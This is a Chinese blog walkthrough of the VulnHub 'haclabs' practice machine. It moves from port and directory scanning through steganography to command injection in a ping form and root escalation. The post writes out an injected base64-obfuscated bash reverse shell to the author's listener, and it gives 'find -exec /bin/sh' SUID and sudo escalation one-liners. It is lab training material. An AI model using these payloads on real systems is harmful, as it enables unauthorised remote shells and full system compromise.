【打靶练习】vulnhub: haclabs

于 2024-03-20 09:34:13 发布
阅读量396 收藏 5
点赞数 5
分类专栏: OSCP打靶练习 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/136851267
版权

提示

图片隐写
命令执行绕过

端口扫描&服务探测&漏洞探测

nmap -p- 172.16.33.49

在这里插入图片描述

nmap -p80 -sV 172.16.33.49

在这里插入图片描述

这个版本的apache是有目录穿越和RCE漏洞的,但是没有成功

nmap -p80 --script=vuln 172.16.33.49

没什么有用的信息

目录扫描

dirsearch -u http://172.16.33.49/

在这里插入图片描述

访问默认页面
在这里插入图片描述

尝试了一下,这个页面没什么用,标题也明示了这是个假的Admin Area

1. 敏感信息收集

admin目录
在这里插入图片描述

admin目录页面放了三张图片,照例看下页面源码
在这里插入图片描述

发现passphrase:harder,图片隐写解密的时候会提示输入passphrase,所以尝试进行图片隐写的信息提取

2. 图片隐写

将三张图片都下载到本地,使用steghide依次尝试提取

steghide extract -sf haclabs.jpeg

在这里插入图片描述

提取出一个文件,读取一下发现superadmin.php
在这里插入图片描述

边界突破

superadmin.php页面
在这里插入图片描述

这里尝试一下,会对输入的IP进行ping,可能存在命令执行

1. 命令执行

这里经过尝试可以通过拼接进行命令执行
在这里插入图片描述

但是没法执行ls命令,猜测可能存在黑白名单过滤,需要多找个payload进行尝试

2. 反弹shell

经过多轮尝试,找到可以执行的命令

127.0.0.1 | echo YmFzaCAtaSAmPi9kZXYvdGNwLzEwLjguMC4xNDkvNDQ0NSA8JjEK | base64 -d | bash

在这里插入图片描述

使用python升级shell(获取完整shell),经常用到的命令,需要的自行查询吧。

提权

1. suid提权

在这里插入图片描述

可以通过find命令提权

find . -exec /bin/sh -p \; -quit

在这里插入图片描述

2. sudo提权

在这里插入图片描述

yash用户家目录,发现flag1.txt文件,通过查看内容,获得提示

在这里插入图片描述

通过全局搜索,查找到隐藏文件

在这里插入图片描述

查看隐藏文件,获得haclabs用户密码:haclabs1234

在这里插入图片描述

查看flag2.txt文件内容,没有提示了
但是可以通过sudo find进行提权

sudo find . -exec /bin/sh \; -quit

在这里插入图片描述

分等级考试的佛
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
haclabs: no_name(HL.ova)靶机渗透-Vulnhub
m0_68117643的博客
07-16 1368
这台靶机(haclabsno_name)仅开放了1个80端口,目录扫描时尽可能使用多个工具和字典,以便尽可能多的收集信息。 突破点:目录扫描(注意字典和参数)——命令执行(注意payoad)—切换用户(注意优化终端)——find提权......
靶机实战(8):OSCP备考之VulnHub haclabs no_name
OneMoreThink
01-05 397
靶机官网:haclabs: no_name[1]实战思路:主机发现端口发现(服务、组件、组件)漏洞发现(获取权限)80端口/HTTP服务组件漏洞URL漏洞(目录、文件)提升权限sudosuid后记一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发现(服务、组件、组件)使用命令sudo -u root nmap 172.16.33.49 -n -Pn -p- --reason -sV -...
PassphrasePassphrasePassphrase
cornivylove的专栏
09-27 3054
Passphrase:纯粹密码,各种code、word、symbol组合,用口令做翻译比较合适;Passcode:翻译成验证码比较靠谱;Password:翻译成暗语比较靠谱,现代通指密码
SQL Server 2008中的代码安全(三):通过PassPhrase加密
邀月周记
03-07 3131
SQL Server 2008中SQL应用系列--目录索引导读:本文主要涉及EncryptByPassPhrase和DecryptByPassPhrase函数进行通行短语(PassPhrase)加密。前言:      在SQL Server 2005和SQL Server 2008之前。如果希望加密敏感数据,如财务信息、工资或身份证号,必须借助外部应用程序或算法。SQL Server 2005引入
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
pillow_heif-0.17.0-pp39-pypy39_pp73-macosx_14_0_arm64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
cykooz.resizer-3.0.0-cp310-cp310-macosx_11_0_arm64.whl
07-27
python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决! python库,可以直接安装使用,再也不怕自己pip下载,出现等待超时的现象。欢迎下载使用,使用过程中如有使用问题,请及时与我沟通交流,帮你解决!
[毕设]Delphi题库管理与试卷自动生成系统.zip
07-27
[毕设]Delphi题库管理与试卷自动生成系统
131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+图像识别与定位+该数据集相关的研究论文
07-27
<项目介绍> 包含131 种水果、蔬菜和坚果的 90380张的高质量图像数据集+该数据集相关的研究论文。可供深度学习图像识别与定位。 - 训练集大小:67700 个图像 测试集大小:22888 个图像 文件名格式:image_index_100.jpg(例如 32_100.jpg)或 r_image_index_100.jpg(例如 r_32_100.jpg)或 r2_image_index_100.jpg 或 r3_image_index_100.jpg。 “r”代表旋转水果。 “r2”表示水果绕第三轴旋转。 “100”来自图像尺寸(100x100 像素)。 水果是如何拍摄的: 1:使用 C920 摄像机拍摄水果。最好的网络摄像头之一。 2:在水果后面,我们放了一张白纸作为背景。 3:将水果和蔬菜种植在低速电机(3转/分钟)的轴中,并录制一段20秒的短片。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
Matlab实现斑点鬣狗优化算法SHO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测.rar
07-27
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
[毕设]HTTP服务器开发与设计.zip
07-27
[毕设]HTTP服务器开发与设计
Delphi简介+demo程序
07-27
Delphi 是一种由 Embarcadero Technologies(原 Borland 公司)开发的编程语言和环境,它基于 Object Pascal 语言,并提供了丰富的类库和可视化的集成开发环境(IDE)。Delphi 特别适合于开发 Windows 桌面应用程序,同时也支持其他操作系统如 macOS、iOS 和 Android(通过 FireMonkey 框架)。 下面是一个简单的 Delphi Demo 程序,该程序将创建一个窗口,并在窗口中添加一个按钮。点击按钮时,会在窗口底部显示一条消息。
qmake2cmake-1.0.6-py3-none-any.whl
最新发布
07-27
qmake2cmake-1.0.6-py3-none-any
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值